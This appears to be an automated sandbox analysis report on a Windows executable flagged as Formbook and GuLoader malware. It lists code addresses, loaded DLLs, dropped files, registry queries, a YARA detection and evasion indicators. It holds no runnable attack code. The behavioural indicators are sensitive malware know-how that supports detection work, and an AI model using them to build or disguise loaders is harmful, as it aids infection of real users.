      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605FA893_2_3605FA89
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605FB2E3_2_3605FB2E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA98703_2_35FA9870
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB8703_2_35FBB870
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA38003_2_35FA3800
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360158703_2_36015870
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605F8723_2_3605F872
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360198B23_2_360198B2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360518DA3_2_360518DA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FDDB193_2_35FDDB19
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360578F33_2_360578F3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBFAA03_2_35FBFAA0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605A6C03_2_3605A6C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360567573_2_36056757
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA04453_2_35FA0445
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA27603_2_35FA2760
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAA7603_2_35FAA760
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9C6E03_2_35F9C6E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606A5263_2_3606A526
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA06803_2_35FA0680
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC46703_2_35FC4670
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBC6003_2_35FBC600
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F900A03_2_35F900A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604C3FC3_2_3604C3FC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604E0763_2_3604E076
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAE3103_2_35FAE310
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606010E3_2_3606010E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB2DB03_2_35FB2DB0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36040E6D3_2_36040E6D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA0D693_2_35FA0D69
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36050EAD3_2_36050EAD
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9AD003_2_35F9AD00
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB8CDF3_2_35FB8CDF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605EFBF3_2_3605EFBF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAAC203_2_35FAAC20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F90C123_2_35F90C12
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA6FE03_2_35FA6FE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601EC203_2_3601EC20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604EC4C3_2_3604EC4C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605EC603_2_3605EC60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36056C693_2_36056C69
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606ACEB3_2_3606ACEB
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FACF003_2_35FACF00
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F92EE83_2_35F92EE8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC0E503_2_35FC0E50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE2E483_2_35FE2E48
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605CA133_2_3605CA13
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9E9A03_2_35F9E9A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605EA5B3_2_3605EA5B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA28C03_2_35FA28C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB68823_2_35FB6882
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F868683_2_35F86868
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36014BC03_2_36014BC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCE8103_2_35FCE810
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360408353_2_36040835
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA0B103_2_35FA0B10
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605E9A63_2_3605E9A6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8D7783_2_05C8D778
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8E70F3_2_05C8E70F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8E3743_2_05C8E374
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8E2583_2_05C8E258
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C9520C3_2_05C9520C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8D7783_2_35C8D778
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8E70F3_2_35C8E70F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8E3743_2_35C8E374
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8E2583_2_35C8E258
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C9520C3_2_35C9520C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CED7783_2_35CED778
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CEE3743_2_35CEE374
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CEE70F3_2_35CEE70F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CEE2583_2_35CEE258
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CF520C3_2_35CF520C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: String function: 3601EF10 appears 105 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: String function: 35FE7BE4 appears 96 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: String function: 35F8B910 appears 272 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: String function: 3600E692 appears 86 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: String function: 35FD5050 appears 37 times
      Source: LkzvfB4VFj.exeStatic PE information: invalid certificate
      Source: LkzvfB4VFj.exe, 00000000.00000000.91614078953.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035D16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000000.92668485631.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000036230000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile created: C:\Users\user\AppData\Local\Temp\nse8818.tmpJump to behavior
      Source: LkzvfB4VFj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: LkzvfB4VFj.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile read: C:\Users\user\Desktop\LkzvfB4VFj.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: LkzvfB4VFj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: LkzvfB4VFj.exe, LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_6FEB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FEB1A98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_6FEB2F60 push eax; ret 0_2_6FEB2F8E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F908CD push ecx; mov dword ptr [esp], ecx3_2_35F908D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C845F7 pushfd ; ret 3_2_05C845F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C84487 push ebp; ret 3_2_05C84493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C844B7 pushfd ; ret 3_2_05C844B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C846B5 push FFFFFF93h; iretd 3_2_05C846C2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C860CB push ds; ret 3_2_05C860D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C95052 push eax; ret 3_2_05C95054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8D248 push ss; retf 3_2_05C8D256
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C86B64 push ebx; iretd 3_2_05C86B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C84B66 push esp; ret 3_2_05C84B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C90B05 push ebp; iretd 3_2_05C90B14
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C8AA5B push esi; retf 3_2_05C8AA61
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C845F7 pushfd ; ret 3_2_35C845F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C84487 push ebp; ret 3_2_35C84493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C844B7 pushfd ; ret 3_2_35C844B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C846B5 push FFFFFF93h; iretd 3_2_35C846C2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C860CB push ds; ret 3_2_35C860D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C95052 push eax; ret 3_2_35C95054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C86B64 push ebx; iretd 3_2_35C86B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C84B66 push esp; ret 3_2_35C84B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C90B05 push ebp; iretd 3_2_35C90B14
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8D248 push ss; retf 3_2_35C8D256
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C8AA5B push esi; retf 3_2_35C8AA61
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE45F7 pushfd ; ret 3_2_35CE45F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE60CB push ds; ret 3_2_35CE60D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE4487 push ebp; ret 3_2_35CE4493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE44B7 pushfd ; ret 3_2_35CE44B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CF5052 push eax; ret 3_2_35CF5054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE4B66 push esp; ret 3_2_35CE4B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CE6B64 push ebx; iretd 3_2_35CE6B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile created: C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
